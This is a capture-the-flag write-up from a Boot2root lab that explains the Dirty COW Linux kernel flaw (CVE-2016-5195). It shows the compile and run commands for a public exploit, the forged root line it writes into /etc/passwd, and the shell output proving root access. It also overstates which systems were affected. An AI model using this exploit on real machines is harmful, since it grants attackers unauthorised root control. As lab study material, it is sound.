

./Cow-tastrophe

The **Dirty COW** (*Dirty copy-on-write*, CVE-2016-5195) vulnerability is a notable security flaw in the Linux kernel, impacting all Linux-based systems prior to 2018.

It's a local privilege escalation bug that takes advantage of a race condition in the copy-on-write mechanism of the kernel's memory-management system. This vulnerability allows a local attacker to manipulate the copy-on-write mechanism to convert a read-only file mapping into a writable one, enabling them to write to memory mappings that should be read-only. Successfully exploited, it can grant an attacker elevated privileges and **root** access on the system.

Steps to Exploit Dirty COW:

- **Target Process Identification:** Find a process on the system suitable for the attack.
- **Race Condition Creation:** Continuously write to a targeted memory page while the kernel marks it as read-only.
- **Malicious Code Injection:** Use ptrace with PTRACE_POKEDATA to write malicious code into the targeted page.
- **Race Condition Exploitation:** Due to the race condition, the kernel might update the page's permissions based on outdated information, allowing the attacker's modifications to persist.

In Our Case:

- **Compiling:** Compile using `gcc -pthread dirty.c -o dirty -lcrypt` and execute with `./dirty [password]`.
- **File Backup:** The exploit starts by backing up `/etc/passwd` to `/tmp/passwd.bak`.
- **User Information Setup:** A user structure is defined and set up with root privileges.
- **Password Hashing and Line Generation:** It hashes a password and creates a formatted password line for `/etc/passwd`.
- **Memory Mapping:** Maps `/etc/passwd` into memory for modification.
- **Fork and Race Condition:** The exploit forks into two processes. The parent uses `ptrace()` to write a new password line, while a child process creates a race condition.
- **Exploitation:** The race condition enables writing a new password line into `/etc/passwd`, bypassing normal permissions.

As a result, a new user with **root privileges** is created in `/etc/passwd`. This user can be accessed using su and the set password, or via SSH. This exploit grants **root** access on the machine.

```
laurie@BornToSecHackMe:~$ https://raw.githubusercontent.com/Alixmixon/Boot2root/main/scripts/mandatory/Cow-tastrophe/dirty.c
```

```
laurie@BornToSecHackMe:~$ gcc -pthread dirty.c -o dirty -lcrypt
```

```
laurie@BornToSecHackMe:~$ ./dirty miao
```

```
/etc/passwd successfully backed up to /tmp/passwd.bak
```

```
Please enter the new password: miao
```

```
Complete line:
```

```
admin:fUEQ1lm9fW02:0:0:pwned:/root:/bin/bash
```

```
mmap: b7fda000
```

```
advise 0
```

```
ptrace 0
```

```
Done! Check /etc/passwd to see if the new user was created.
```

```
You can log in with the username 'admin' and the password 'miao'.
```

```
laurie@BornToSecHackMe:~$ su admin
```

```
Password: miao
```

```
admin@BornToSecHackMe:/home/laurie# cd
```

```
admin@BornToSecHackMe:~# whoami
```

```
admin
```

```
admin@BornToSecHackMe:~# id
```

```
uid=0(admin) gid=0(root) groups=0(root)
```

```
admin@BornToSecHackMe:~# cd /root
```

```
admin@BornToSecHackMe:~# ls
```

```
README
```

```
admin@BornToSecHackMe:~# cat README
```

```
CONGRATULATIONS !!!!
```

```
To be continued...
```